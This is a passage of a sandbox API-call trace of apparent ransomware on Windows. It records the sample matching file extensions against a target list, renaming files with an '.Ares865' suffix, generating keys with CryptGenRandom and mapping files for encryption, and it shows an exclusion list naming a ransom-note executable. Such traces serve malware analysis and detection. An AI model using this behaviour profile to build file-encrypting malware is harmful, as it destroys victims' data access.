lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0058.941] lstrlenW (lpString="db2") returned 3 [0058.941] lstrcmpiW (lpString1="ink", lpString2="db2") returned 1 [0058.941] lstrlenW (lpString="db3") returned 3 [0058.941] lstrcmpiW (lpString1="ink", lpString2="db3") returned 1 [0058.941] lstrlenW (lpString="dbf") returned 3 [0058.941] lstrcmpiW (lpString1="ink", lpString2="dbf") returned 1 [0058.941] lstrlenW (lpString="mdf") returned 3 [0058.941] lstrcmpiW (lpString1="ink", lpString2="mdf") returned -1 [0058.941] lstrlenW (lpString="mdb") returned 3 [0058.941] lstrcmpiW (lpString1="ink", lpString2="mdb") returned -1 [0058.941] lstrlenW (lpString="sql") returned 3 [0058.941] lstrcmpiW (lpString1="ink", lpString2="sql") returned -1 [0058.941] lstrlenW (lpString="sqlite") returned 6 [0058.941] lstrcmpiW (lpString1="skLink", lpString2="sqlite") returned -1 [0058.941] lstrlenW (lpString="sqlite3") returned 7 [0058.941] lstrcmpiW (lpString1="eskLink", lpString2="sqlite3") returned -1 [0058.941] lstrlenW (lpString="sqlitedb") returned 8 [0058.941] lstrcmpiW (lpString1="DeskLink", lpString2="sqlitedb") returned -1 [0058.941] lstrlenW (lpString="xml") returned 3 [0058.941] lstrcmpiW (lpString1="ink", lpString2="xml") returned -1 [0058.941] lstrlenW (lpString="$er") returned 3 [0058.941] lstrcmpiW (lpString1="ink", lpString2="$er") returned 1 [0058.941] lstrlenW (lpString="4dd") returned 3 [0058.941] lstrcmpiW (lpString1="ink", lpString2="4dd") returned 1 [0058.941] lstrlenW (lpString="4dl") returned 3 [0058.941] lstrcmpiW (lpString1="ink", lpString2="4dl") returned 1 [0058.942] lstrlenW (lpString="^^^") returned 3 [0058.942] lstrcmpiW (lpString1="ink", lpString2="^^^") returned 1 [0058.942] lstrlenW (lpString="abs") returned 3 [0058.942] lstrcmpiW (lpString1="ink", lpString2="abs") returned 1 [0058.942] lstrlenW (lpString="abx") returned 3 [0058.942] lstrcmpiW (lpString1="ink", lpString2="abx") returned 1 [0058.942] lstrlenW (lpString="accdb") returned 5 [0058.942] lstrcmpiW (lpString1="kLink", lpString2="accdb") returned 1 [0058.942] lstrlenW (lpString="accdc") returned 5 [0058.942] lstrcmpiW (lpString1="kLink", lpString2="accdc") returned 1 [0058.942] lstrlenW (lpString="accde") returned 5 [0058.942] lstrcmpiW (lpString1="kLink", lpString2="accde") returned 1 [0058.942] lstrlenW (lpString="accdr") returned 5 [0058.942] lstrcmpiW (lpString1="kLink", lpString2="accdr") returned 1 [0058.942] lstrlenW (lpString="accdt") returned 5 [0058.942] lstrcmpiW (lpString1="kLink", lpString2="accdt") returned 1 [0058.942] lstrlenW (lpString="accdw") returned 5 [0058.942] lstrcmpiW (lpString1="kLink", lpString2="accdw") returned 1 [0058.942] lstrlenW (lpString="accft") returned 5 [0058.942] lstrcmpiW (lpString1="kLink", lpString2="accft") returned 1 [0058.942] lstrlenW (lpString="adb") returned 3 [0058.942] lstrcmpiW (lpString1="ink", lpString2="adb") returned 1 [0058.942] lstrlenW (lpString="adb") returned 3 [0058.942] lstrcmpiW (lpString1="ink", lpString2="adb") returned 1 [0058.942] lstrlenW (lpString="ade") returned 3 [0058.942] lstrcmpiW (lpString1="ink", lpString2="ade") returned 1 [0058.942] lstrlenW (lpString="adf") returned 3 [0058.942] lstrcmpiW (lpString1="ink", lpString2="adf") returned 1 [0058.942] lstrlenW (lpString="adn") returned 3 [0058.942] lstrcmpiW (lpString1="ink", lpString2="adn") returned 1 [0058.942] lstrlenW (lpString="adp") returned 3 [0058.942] lstrcmpiW (lpString1="ink", lpString2="adp") returned 1 [0058.942] lstrlenW (lpString="alf") returned 3 [0058.942] lstrcmpiW (lpString1="ink", lpString2="alf") returned 1 [0058.942] lstrlenW (lpString="ask") returned 3 [0058.942] lstrcmpiW (lpString1="ink", lpString2="ask") returned 1 [0058.942] lstrlenW (lpString="btr") returned 3 [0058.943] lstrcmpiW (lpString1="ink", lpString2="btr") returned 1 [0058.943] lstrlenW (lpString="cat") returned 3 [0058.943] lstrcmpiW (lpString1="ink", lpString2="cat") returned 1 [0058.943] lstrlenW (lpString="cdb") returned 3 [0058.943] lstrcmpiW (lpString1="ink", lpString2="cdb") returned 1 [0058.943] lstrlenW (lpString="ckp") returned 3 [0058.943] lstrcmpiW (lpString1="ink", lpString2="ckp") returned 1 [0058.943] lstrlenW (lpString="cma") returned 3 [0058.943] lstrcmpiW (lpString1="ink", lpString2="cma") returned 1 [0058.943] lstrlenW (lpString="cpd") returned 3 [0058.943] lstrcmpiW (lpString1="ink", lpString2="cpd") returned 1 [0058.943] lstrlenW (lpString="dacpac") returned 6 [0058.943] lstrcmpiW (lpString1="skLink", lpString2="dacpac") returned 1 [0058.943] lstrlenW (lpString="dad") returned 3 [0058.943] lstrcmpiW (lpString1="ink", lpString2="dad") returned 1 [0058.943] lstrlenW (lpString="dadiagrams") returned 10 [0058.943] lstrcmpiW (lpString1=").DeskLink", lpString2="dadiagrams") returned -1 [0058.943] lstrlenW (lpString="daschema") returned 8 [0058.943] lstrcmpiW (lpString1="DeskLink", lpString2="daschema") returned 1 [0058.943] lstrlenW (lpString="db-journal") returned 10 [0058.943] lstrcmpiW (lpString1=").DeskLink", lpString2="db-journal") returned -1 [0058.943] lstrlenW (lpString="db-shm") returned 6 [0058.943] lstrcmpiW (lpString1="skLink", lpString2="db-shm") returned 1 [0058.943] lstrlenW (lpString="db-wal") returned 6 [0058.943] lstrcmpiW (lpString1="skLink", lpString2="db-wal") returned 1 [0058.943] lstrlenW (lpString="dbc") returned 3 [0058.943] lstrcmpiW (lpString1="ink", lpString2="dbc") returned 1 [0058.943] lstrlenW (lpString="dbs") returned 3 [0058.943] lstrcmpiW (lpString1="ink", lpString2="dbs") returned 1 [0058.943] lstrlenW (lpString="dbt") returned 3 [0058.943] lstrcmpiW (lpString1="ink", lpString2="dbt") returned 1 [0058.943] lstrlenW (lpString="dbv") returned 3 [0058.943] lstrcmpiW (lpString1="ink", lpString2="dbv") returned 1 [0058.943] lstrlenW (lpString="dbx") returned 3 [0058.943] lstrcmpiW (lpString1="ink", lpString2="dbx") returned 1 [0058.943] lstrlenW (lpString="dcb") returned 3 [0058.943] lstrcmpiW (lpString1="ink", lpString2="dcb") returned 1 [0058.944] lstrlenW (lpString="dct") returned 3 [0058.944] lstrcmpiW (lpString1="ink", lpString2="dct") returned 1 [0058.944] lstrlenW (lpString="dcx") returned 3 [0058.944] lstrcmpiW (lpString1="ink", lpString2="dcx") returned 1 [0058.944] lstrlenW (lpString="ddl") returned 3 [0058.944] lstrcmpiW (lpString1="ink", lpString2="ddl") returned 1 [0058.944] lstrlenW (lpString="dlis") returned 4 [0058.944] lstrcmpiW (lpString1="Link", lpString2="dlis") returned 1 [0058.944] lstrlenW (lpString="dp1") returned 3 [0058.944] lstrcmpiW (lpString1="ink", lpString2="dp1") returned 1 [0058.944] lstrlenW (lpString="dqy") returned 3 [0058.944] lstrcmpiW (lpString1="ink", lpString2="dqy") returned 1 [0058.944] lstrlenW (lpString="dsk") returned 3 [0058.944] lstrcmpiW (lpString1="ink", lpString2="dsk") returned 1 [0058.944] lstrlenW (lpString="dsn") returned 3 [0058.944] lstrcmpiW (lpString1="ink", lpString2="dsn") returned 1 [0058.944] lstrlenW (lpString="dtsx") returned 4 [0058.944] lstrcmpiW (lpString1="Link", lpString2="dtsx") returned 1 [0058.944] lstrlenW (lpString="dxl") returned 3 [0058.944] lstrcmpiW (lpString1="ink", lpString2="dxl") returned 1 [0058.944] lstrlenW (lpString="eco") returned 3 [0058.944] lstrcmpiW (lpString1="ink", lpString2="eco") returned 1 [0058.944] lstrlenW (lpString="ecx") returned 3 [0058.944] lstrcmpiW (lpString1="ink", lpString2="ecx") returned 1 [0058.944] lstrlenW (lpString="edb") returned 3 [0058.944] lstrcmpiW (lpString1="ink", lpString2="edb") returned 1 [0058.944] lstrlenW (lpString="epim") returned 4 [0058.944] lstrcmpiW (lpString1="Link", lpString2="epim") returned 1 [0058.944] lstrlenW (lpString="fcd") returned 3 [0058.944] lstrcmpiW (lpString1="ink", lpString2="fcd") returned 1 [0058.944] lstrlenW (lpString="fdb") returned 3 [0058.944] lstrcmpiW (lpString1="ink", lpString2="fdb") returned 1 [0058.944] lstrlenW (lpString="fic") returned 3 [0058.944] lstrcmpiW (lpString1="ink", lpString2="fic") returned 1 [0058.944] lstrlenW (lpString="flexolibrary") returned 12 [0058.944] lstrcmpiW (lpString1="ut).DeskLink", lpString2="flexolibrary") returned 1 [0058.944] lstrlenW (lpString="fm5") returned 3 [0058.944] lstrcmpiW (lpString1="ink", lpString2="fm5") returned 1 [0058.945] lstrlenW (lpString="fmp") returned 3 [0058.945] lstrcmpiW (lpString1="ink", lpString2="fmp") returned 1 [0058.945] lstrlenW (lpString="fmp12") returned 5 [0058.945] lstrcmpiW (lpString1="kLink", lpString2="fmp12") returned 1 [0058.945] lstrlenW (lpString="fmpsl") returned 5 [0058.945] lstrcmpiW (lpString1="kLink", lpString2="fmpsl") returned 1 [0058.945] lstrlenW (lpString="fol") returned 3 [0058.945] lstrcmpiW (lpString1="ink", lpString2="fol") returned 1 [0058.945] lstrlenW (lpString="fp3") returned 3 [0058.945] lstrcmpiW (lpString1="ink", lpString2="fp3") returned 1 [0058.945] lstrlenW (lpString="fp4") returned 3 [0058.945] lstrcmpiW (lpString1="ink", lpString2="fp4") returned 1 [0058.945] lstrlenW (lpString="fp5") returned 3 [0058.945] lstrcmpiW (lpString1="ink", lpString2="fp5") returned 1 [0058.945] lstrlenW (lpString="fp7") returned 3 [0058.945] lstrcmpiW (lpString1="ink", lpString2="fp7") returned 1 [0058.945] lstrlenW (lpString="fpt") returned 3 [0058.945] lstrcmpiW (lpString1="ink", lpString2="fpt") returned 1 [0058.945] lstrlenW (lpString="frm") returned 3 [0058.945] lstrcmpiW (lpString1="ink", lpString2="frm") returned 1 [0058.945] lstrlenW (lpString="gdb") returned 3 [0058.945] lstrcmpiW (lpString1="ink", lpString2="gdb") returned 1 [0058.945] lstrlenW (lpString="gdb") returned 3 [0058.945] lstrcmpiW (lpString1="ink", lpString2="gdb") returned 1 [0058.945] lstrlenW (lpString="grdb") returned 4 [0058.945] lstrcmpiW (lpString1="Link", lpString2="grdb") returned 1 [0058.945] lstrlenW (lpString="gwi") returned 3 [0058.945] lstrcmpiW (lpString1="ink", lpString2="gwi") returned 1 [0058.945] lstrlenW (lpString="hdb") returned 3 [0058.945] lstrcmpiW (lpString1="ink", lpString2="hdb") returned 1 [0058.945] lstrlenW (lpString="his") returned 3 [0058.945] lstrcmpiW (lpString1="ink", lpString2="his") returned 1 [0058.945] lstrlenW (lpString="ib") returned 2 [0058.945] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0058.945] lstrlenW (lpString="idb") returned 3 [0058.945] lstrcmpiW (lpString1="ink", lpString2="idb") returned 1 [0058.945] lstrlenW (lpString="ihx") returned 3 [0058.945] lstrcmpiW (lpString1="ink", lpString2="ihx") returned 1 [0058.946] lstrlenW (lpString="itdb") returned 4 [0058.946] lstrcmpiW (lpString1="Link", lpString2="itdb") returned 1 [0058.946] lstrlenW (lpString="itw") returned 3 [0058.946] lstrcmpiW (lpString1="ink", lpString2="itw") returned -1 [0058.946] lstrlenW (lpString="jet") returned 3 [0058.946] lstrcmpiW (lpString1="ink", lpString2="jet") returned -1 [0058.946] lstrlenW (lpString="jtx") returned 3 [0058.946] lstrcmpiW (lpString1="ink", lpString2="jtx") returned -1 [0058.946] lstrlenW (lpString="kdb") returned 3 [0058.946] lstrcmpiW (lpString1="ink", lpString2="kdb") returned -1 [0058.946] lstrlenW (lpString="kexi") returned 4 [0058.946] lstrcmpiW (lpString1="Link", lpString2="kexi") returned 1 [0058.946] lstrlenW (lpString="kexic") returned 5 [0058.946] lstrcmpiW (lpString1="kLink", lpString2="kexic") returned 1 [0058.946] lstrlenW (lpString="kexis") returned 5 [0058.946] lstrcmpiW (lpString1="kLink", lpString2="kexis") returned 1 [0058.946] lstrlenW (lpString="lgc") returned 3 [0058.946] lstrcmpiW (lpString1="ink", lpString2="lgc") returned -1 [0058.946] lstrlenW (lpString="lwx") returned 3 [0058.946] lstrcmpiW (lpString1="ink", lpString2="lwx") returned -1 [0058.946] lstrlenW (lpString="maf") returned 3 [0058.946] lstrcmpiW (lpString1="ink", lpString2="maf") returned -1 [0058.946] lstrlenW (lpString="maq") returned 3 [0058.946] lstrcmpiW (lpString1="ink", lpString2="maq") returned -1 [0058.946] lstrlenW (lpString="mar") returned 3 [0058.946] lstrcmpiW (lpString1="ink", lpString2="mar") returned -1 [0058.947] lstrlenW (lpString="marshal") returned 7 [0058.947] lstrcmpiW (lpString1="eskLink", lpString2="marshal") returned -1 [0058.947] lstrlenW (lpString="mas") returned 3 [0058.947] lstrcmpiW (lpString1="ink", lpString2="mas") returned -1 [0058.947] lstrlenW (lpString="mav") returned 3 [0058.947] lstrcmpiW (lpString1="ink", lpString2="mav") returned -1 [0058.947] lstrlenW (lpString="maw") returned 3 [0058.947] lstrcmpiW (lpString1="ink", lpString2="maw") returned -1 [0058.947] lstrlenW (lpString="mdbhtml") returned 7 [0058.947] lstrcmpiW (lpString1="eskLink", lpString2="mdbhtml") returned -1 [0058.947] lstrlenW (lpString="mdn") returned 3 [0058.947] lstrcmpiW (lpString1="ink", lpString2="mdn") returned -1 [0058.947] lstrlenW (lpString="mdt") returned 3 [0058.947] lstrcmpiW (lpString1="ink", lpString2="mdt") returned -1 [0058.947] lstrlenW (lpString="mfd") returned 3 [0058.947] lstrcmpiW (lpString1="ink", lpString2="mfd") returned -1 [0058.947] lstrlenW (lpString="mpd") returned 3 [0058.947] lstrcmpiW (lpString1="ink", lpString2="mpd") returned -1 [0058.947] lstrlenW (lpString="mrg") returned 3 [0058.947] lstrcmpiW (lpString1="ink", lpString2="mrg") returned -1 [0058.947] lstrlenW (lpString="mud") returned 3 [0058.947] lstrcmpiW (lpString1="ink", lpString2="mud") returned -1 [0058.947] lstrlenW (lpString="mwb") returned 3 [0058.947] lstrcmpiW (lpString1="ink", lpString2="mwb") returned -1 [0058.947] lstrlenW (lpString="myd") returned 3 [0058.947] lstrcmpiW (lpString1="ink", lpString2="myd") returned -1 [0058.947] lstrlenW (lpString="ndf") returned 3 [0058.947] lstrcmpiW (lpString1="ink", lpString2="ndf") returned -1 [0058.947] lstrlenW (lpString="nnt") returned 3 [0058.947] lstrcmpiW (lpString1="ink", lpString2="nnt") returned -1 [0058.947] lstrlenW (lpString="nrmlib") returned 6 [0058.947] lstrcmpiW (lpString1="skLink", lpString2="nrmlib") returned 1 [0058.947] lstrlenW (lpString="ns2") returned 3 [0058.947] lstrcmpiW (lpString1="ink", lpString2="ns2") returned -1 [0058.947] lstrlenW (lpString="ns3") returned 3 [0058.947] lstrcmpiW (lpString1="ink", lpString2="ns3") returned -1 [0058.947] lstrlenW (lpString="ns4") returned 3 [0058.947] lstrcmpiW (lpString1="ink", lpString2="ns4") returned -1 [0058.948] lstrlenW (lpString="nsf") returned 3 [0058.948] lstrcmpiW (lpString1="ink", lpString2="nsf") returned -1 [0058.948] lstrlenW (lpString="nv") returned 2 [0058.948] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0058.948] lstrlenW (lpString="nv2") returned 3 [0058.948] lstrcmpiW (lpString1="ink", lpString2="nv2") returned -1 [0058.948] lstrlenW (lpString="nwdb") returned 4 [0058.948] lstrcmpiW (lpString1="Link", lpString2="nwdb") returned -1 [0058.948] lstrlenW (lpString="nyf") returned 3 [0058.948] lstrcmpiW (lpString1="ink", lpString2="nyf") returned -1 [0058.948] lstrlenW (lpString="odb") returned 3 [0058.948] lstrcmpiW (lpString1="ink", lpString2="odb") returned -1 [0058.948] lstrlenW (lpString="odb") returned 3 [0058.948] lstrcmpiW (lpString1="ink", lpString2="odb") returned -1 [0058.948] lstrlenW (lpString="oqy") returned 3 [0058.948] lstrcmpiW (lpString1="ink", lpString2="oqy") returned -1 [0058.948] lstrlenW (lpString="ora") returned 3 [0058.948] lstrcmpiW (lpString1="ink", lpString2="ora") returned -1 [0058.948] lstrlenW (lpString="orx") returned 3 [0058.948] lstrcmpiW (lpString1="ink", lpString2="orx") returned -1 [0058.948] lstrlenW (lpString="owc") returned 3 [0058.948] lstrcmpiW (lpString1="ink", lpString2="owc") returned -1 [0058.948] lstrlenW (lpString="p96") returned 3 [0058.948] lstrcmpiW (lpString1="ink", lpString2="p96") returned -1 [0058.948] lstrlenW (lpString="p97") returned 3 [0058.948] lstrcmpiW (lpString1="ink", lpString2="p97") returned -1 [0058.948] lstrlenW (lpString="pan") returned 3 [0058.948] lstrcmpiW (lpString1="ink", lpString2="pan") returned -1 [0058.948] lstrlenW (lpString="pdb") returned 3 [0058.948] lstrcmpiW (lpString1="ink", lpString2="pdb") returned -1 [0058.948] lstrlenW (lpString="pdm") returned 3 [0058.948] lstrcmpiW (lpString1="ink", lpString2="pdm") returned -1 [0058.948] lstrlenW (lpString="pnz") returned 3 [0058.948] lstrcmpiW (lpString1="ink", lpString2="pnz") returned -1 [0058.948] lstrlenW (lpString="qry") returned 3 [0058.948] lstrcmpiW (lpString1="ink", lpString2="qry") returned -1 [0058.948] lstrlenW (lpString="qvd") returned 3 [0058.948] lstrcmpiW (lpString1="ink", lpString2="qvd") returned -1 [0058.949] lstrlenW (lpString="rbf") returned 3 [0058.949] lstrcmpiW (lpString1="ink", lpString2="rbf") returned -1 [0058.949] lstrlenW (lpString="rctd") returned 4 [0058.949] lstrcmpiW (lpString1="Link", lpString2="rctd") returned -1 [0058.949] lstrlenW (lpString="rod") returned 3 [0058.949] lstrcmpiW (lpString1="ink", lpString2="rod") returned -1 [0058.949] lstrlenW (lpString="rodx") returned 4 [0058.949] lstrcmpiW (lpString1="Link", lpString2="rodx") returned -1 [0058.949] lstrlenW (lpString="rpd") returned 3 [0058.949] lstrcmpiW (lpString1="ink", lpString2="rpd") returned -1 [0058.949] lstrlenW (lpString="rsd") returned 3 [0058.949] lstrcmpiW (lpString1="ink", lpString2="rsd") returned -1 [0058.949] lstrlenW (lpString="sas7bdat") returned 8 [0058.949] lstrcmpiW (lpString1="DeskLink", lpString2="sas7bdat") returned -1 [0058.949] lstrlenW (lpString="sbf") returned 3 [0058.949] lstrcmpiW (lpString1="ink", lpString2="sbf") returned -1 [0058.949] lstrlenW (lpString="scx") returned 3 [0058.949] lstrcmpiW (lpString1="ink", lpString2="scx") returned -1 [0058.949] lstrlenW (lpString="sdb") returned 3 [0058.949] lstrcmpiW (lpString1="ink", lpString2="sdb") returned -1 [0058.949] lstrlenW (lpString="sdc") returned 3 [0058.949] lstrcmpiW (lpString1="ink", lpString2="sdc") returned -1 [0058.949] lstrlenW (lpString="sdf") returned 3 [0058.949] lstrcmpiW (lpString1="ink", lpString2="sdf") returned -1 [0058.949] lstrlenW (lpString="sis") returned 3 [0058.949] lstrcmpiW (lpString1="ink", lpString2="sis") returned -1 [0058.949] lstrlenW (lpString="spq") returned 3 [0058.949] lstrcmpiW (lpString1="ink", lpString2="spq") returned -1 [0058.949] lstrlenW (lpString="te") returned 2 [0058.949] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0058.949] lstrlenW (lpString="teacher") returned 7 [0058.949] lstrcmpiW (lpString1="eskLink", lpString2="teacher") returned -1 [0058.949] lstrlenW (lpString="tmd") returned 3 [0058.949] lstrcmpiW (lpString1="ink", lpString2="tmd") returned -1 [0058.949] lstrlenW (lpString="tps") returned 3 [0058.949] lstrcmpiW (lpString1="ink", lpString2="tps") returned -1 [0058.949] lstrlenW (lpString="trc") returned 3 [0058.949] lstrcmpiW (lpString1="ink", lpString2="trc") returned -1 [0058.950] lstrlenW (lpString="trc") returned 3 [0058.950] lstrcmpiW (lpString1="ink", lpString2="trc") returned -1 [0058.950] lstrlenW (lpString="trm") returned 3 [0058.950] lstrcmpiW (lpString1="ink", lpString2="trm") returned -1 [0058.950] lstrlenW (lpString="udb") returned 3 [0058.950] lstrcmpiW (lpString1="ink", lpString2="udb") returned -1 [0058.950] lstrlenW (lpString="udl") returned 3 [0058.950] lstrcmpiW (lpString1="ink", lpString2="udl") returned -1 [0058.950] lstrlenW (lpString="usr") returned 3 [0058.950] lstrcmpiW (lpString1="ink", lpString2="usr") returned -1 [0058.950] lstrlenW (lpString="v12") returned 3 [0058.950] lstrcmpiW (lpString1="ink", lpString2="v12") returned -1 [0058.950] lstrlenW (lpString="vis") returned 3 [0058.950] lstrcmpiW (lpString1="ink", lpString2="vis") returned -1 [0058.950] lstrlenW (lpString="vpd") returned 3 [0058.950] lstrcmpiW (lpString1="ink", lpString2="vpd") returned -1 [0058.950] lstrlenW (lpString="vvv") returned 3 [0058.950] lstrcmpiW (lpString1="ink", lpString2="vvv") returned -1 [0058.950] lstrlenW (lpString="wdb") returned 3 [0058.950] lstrcmpiW (lpString1="ink", lpString2="wdb") returned -1 [0058.950] lstrlenW (lpString="wmdb") returned 4 [0058.950] lstrcmpiW (lpString1="Link", lpString2="wmdb") returned -1 [0058.950] lstrlenW (lpString="wrk") returned 3 [0058.950] lstrcmpiW (lpString1="ink", lpString2="wrk") returned -1 [0058.950] lstrlenW (lpString="xdb") returned 3 [0058.950] lstrcmpiW (lpString1="ink", lpString2="xdb") returned -1 [0058.950] lstrlenW (lpString="xld") returned 3 [0058.950] lstrcmpiW (lpString1="ink", lpString2="xld") returned -1 [0058.950] lstrlenW (lpString="xmlff") returned 5 [0058.950] lstrcmpiW (lpString1="kLink", lpString2="xmlff") returned -1 [0058.950] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\SendTo\\Desktop (create shortcut).DeskLink.Ares865") returned 71 [0058.950] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\SendTo\\Desktop (create shortcut).DeskLink" (normalized: "c:\\users\\default user\\sendto\\desktop (create shortcut).desklink"), lpNewFileName="C:\\Users\\Default User\\SendTo\\Desktop (create shortcut).DeskLink.Ares865" (normalized: "c:\\users\\default user\\sendto\\desktop (create shortcut).desklink.ares865"), dwFlags=0x1) returned 1 [0058.951] CreateFileW (lpFileName="C:\\Users\\Default User\\SendTo\\Desktop (create shortcut).DeskLink.Ares865" (normalized: "c:\\users\\default user\\sendto\\desktop (create shortcut).desklink.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0058.951] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7) returned 1 [0058.951] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.952] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0058.952] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.952] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0058.952] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0058.952] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.953] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x310, lpName=0x0) returned 0x118 [0058.958] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x310) returned 0x190000 [0058.965] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0058.965] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0058.965] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.965] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0058.965] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0058.966] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.966] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.966] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.966] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.966] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cbdb0 [0058.966] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.966] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbdb0 | out: hHeap=0x2b0000) returned 1 [0058.966] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.966] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.966] CloseHandle (hObject=0x118) returned 1 [0058.966] CloseHandle (hObject=0x164) returned 1 [0058.968] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.968] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.968] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.968] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xec18bec6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x63dece0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3d828fa3, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x22e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0058.968] lstrcmpiW (lpString1="Desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.968] lstrcmpiW (lpString1="Desktop.ini", lpString2="aoldtz.exe") returned 1 [0058.968] lstrcmpiW (lpString1="Desktop.ini", lpString2=".") returned 1 [0058.968] lstrcmpiW (lpString1="Desktop.ini", lpString2="..") returned 1 [0058.968] lstrcmpiW (lpString1="Desktop.ini", lpString2="windows") returned -1 [0058.968] lstrcmpiW (lpString1="Desktop.ini", lpString2="bootmgr") returned 1 [0058.968] lstrcmpiW (lpString1="Desktop.ini", lpString2="temp") returned -1 [0058.968] lstrcmpiW (lpString1="Desktop.ini", lpString2="pagefile.sys") returned -1 [0058.968] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot") returned 1 [0058.968] lstrcmpiW (lpString1="Desktop.ini", lpString2="ids.txt") returned -1 [0058.968] lstrcmpiW (lpString1="Desktop.ini", lpString2="ntuser.dat") returned -1 [0058.968] lstrcmpiW (lpString1="Desktop.ini", lpString2="perflogs") returned -1 [0058.968] lstrcmpiW (lpString1="Desktop.ini", lpString2="MSBuild") returned -1 [0058.968] lstrlenW (lpString="Desktop.ini") returned 11 [0058.968] lstrlenW (lpString="C:\\Users\\Default User\\SendTo\\Desktop (create shortcut).DeskLink") returned 63 [0058.968] lstrcpyW (in: lpString1=0x2cce43a, lpString2="Desktop.ini" | out: lpString1="Desktop.ini") returned="Desktop.ini" [0058.968] lstrlenW (lpString="Desktop.ini") returned 11 [0058.968] lstrlenW (lpString="Ares865") returned 7 [0058.968] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0058.968] lstrlenW (lpString=".dll") returned 4 [0058.968] lstrcmpiW (lpString1="Desktop.ini", lpString2=".dll") returned 1 [0058.968] lstrlenW (lpString=".lnk") returned 4 [0058.968] lstrcmpiW (lpString1="Desktop.ini", lpString2=".lnk") returned 1 [0058.969] lstrlenW (lpString=".ini") returned 4 [0058.969] lstrcmpiW (lpString1="Desktop.ini", lpString2=".ini") returned 1 [0058.969] lstrlenW (lpString=".sys") returned 4 [0058.969] lstrcmpiW (lpString1="Desktop.ini", lpString2=".sys") returned 1 [0058.969] lstrlenW (lpString="Desktop.ini") returned 11 [0058.969] lstrlenW (lpString="bak") returned 3 [0058.969] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0058.969] lstrlenW (lpString="ba_") returned 3 [0058.969] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0058.969] lstrlenW (lpString="dbb") returned 3 [0058.969] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0058.969] lstrlenW (lpString="vmdk") returned 4 [0058.969] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0058.969] lstrlenW (lpString="rar") returned 3 [0058.969] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0058.969] lstrlenW (lpString="zip") returned 3 [0058.969] lstrcmpiW (lpString1="ini", 